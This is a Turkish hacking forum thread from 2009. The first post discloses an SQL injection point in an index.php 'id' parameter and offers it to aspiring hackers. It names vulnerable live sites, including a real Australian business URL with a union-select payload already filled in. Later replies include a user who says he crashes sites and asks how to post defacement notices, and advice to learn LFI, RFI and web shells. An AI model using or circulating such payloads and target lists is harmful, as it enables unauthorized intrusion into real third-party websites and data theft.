hacking eğitimi....sql dersi...

pentest

Üye
17 Tem 2009
104
0
...arkadaşlar bu bulduğum açık SQL açığıdır...hacking de gelişmek isteyenlere sunuyorum....lütfen üstadlar açıklı sitelere dookunmayın ...2 tane de yabancı örnek site vardır....kendini geliştirmek isteyenler için bi dökümandır...gelelim açığımıza...


açık index.php içinde....

http://localhost/[path]/index.php?n=xx&id=[SQL]

burada SQL uygulayacaksınız ...işte ik tane bulduğum örnek site...


https://tik.lat/ss80g
http://www.colourmebeautiful.com.au/index.php?n=1&id=-1+union+select+1,version()--


kolay gelsinn..:secret
 

m.tahir

Katılımcı Üye
26 Eyl 2008
809
0
off hack konusunda hiç bi şey bilmiyom ya ne dediğinizi bile anlamıyom
 

metocan96

Yeni üye
4 Nis 2009
2
0
BaRoNiSt dostum bana hacker olmakta yardımcı olurmusun site çökertiyorum ama Siteyi ekleyipde hani bu site bu kişi tarafından hacklenmiştir diye yazı varyha onu nasıl yapıcağımı bulamıyorum yardımcı olucak varmı LÜTFEN!
 

pentest

Üye
17 Tem 2009
104
0
kardeşim bırak bu işleri...ISS ve türevi işlerle uğraşmakla hacker olunmaz...ancak üst düzey lamer olursun....

hacker olmak istiyorsan LFI RFI SQL MYSQL SHELL kavramlarını öğren...birazda PHP bilgin olması gerek.....

SELAMETLE.....
 

eray6161

Yeni üye
19 Ağu 2009
4
0
yaf hackerliğin nasıl yapıldığını hani tür sitede hangi şeyin kullanılacağını ve nasıl yapılacağı hakkında bi bilgi verirmisiniz..???
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.